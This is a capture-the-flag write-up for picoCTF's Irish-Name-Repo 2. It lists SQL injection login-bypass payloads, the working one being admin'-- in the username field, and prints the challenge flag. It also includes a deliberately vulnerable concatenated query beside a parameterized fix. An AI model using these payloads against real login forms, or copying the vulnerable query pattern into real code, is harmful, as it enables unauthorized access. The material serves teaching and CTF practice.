Coming from this challenge's prequel Irish-Name-Repo 1 - picoCTF '19, I was hellbent thinking I had to encode the password parameter. I tried several SQL injection variations, including:
- ' oR 1=1 -- (case manipulation)
- %27%20%20%6f%72%20%31%3d%31%20%2d%2d (URL encoding)
- '/**/ or /**/ 1=1 /**/ -- (comment obfuscation)
- 00%' or 1=1 -- (null hex encoding)
...and other combinations but to no avail. Once I shifted my attention, the solution became straightforward.
STEPS TO SOLUTION
Use admin'-- in the username parameter.
Breakdown:
- admin : value for username query.
- ' : closes the input string.
- -- : comments out the remaining query.
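For the defensive side of the breakdown above, here is an added example (not code from the challenge or from this writeup) that puts a string-concatenated login query next to a parameterized one. The table layout, the function names and the keyword filter on the password field are assumptions, since the challenge's server-side code is not shown.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not part of the writeup.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    # Weak pattern: user input is pasted into the SQL text.
    # Assumed keyword filter, applied to the password field only.
    if " or " in password.lower():
        return None
    sql = ("SELECT name FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, username, password):
    # Hardened pattern: placeholders keep both inputs as data, so a quote
    # or a comment marker in them never becomes part of the SQL syntax.
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    # Filter blocks the password-field attempt from the list above.
    print(login_concat(db, "admin", "' oR 1=1 --"))   # None
    # Unfiltered username field: the query is cut off after name = 'admin'.
    print(login_concat(db, "admin'--", "x"))          # admin
    # Same input against the parameterized query: no match, no login.
    print(login_param(db, "admin'--", "x"))           # None
    print(login_param(db, "admin", "constructed-secret"))  # admin
```

Filtering a single field leaves the other one injectable; binding parameters removes the injection point in both.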
FLAG: picoCTF{m0R3_SQL_plz_fa983901}
PWNSOME REFERENCES
https://portswigger.net/support/sql-injection-bypassing-common-filters
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection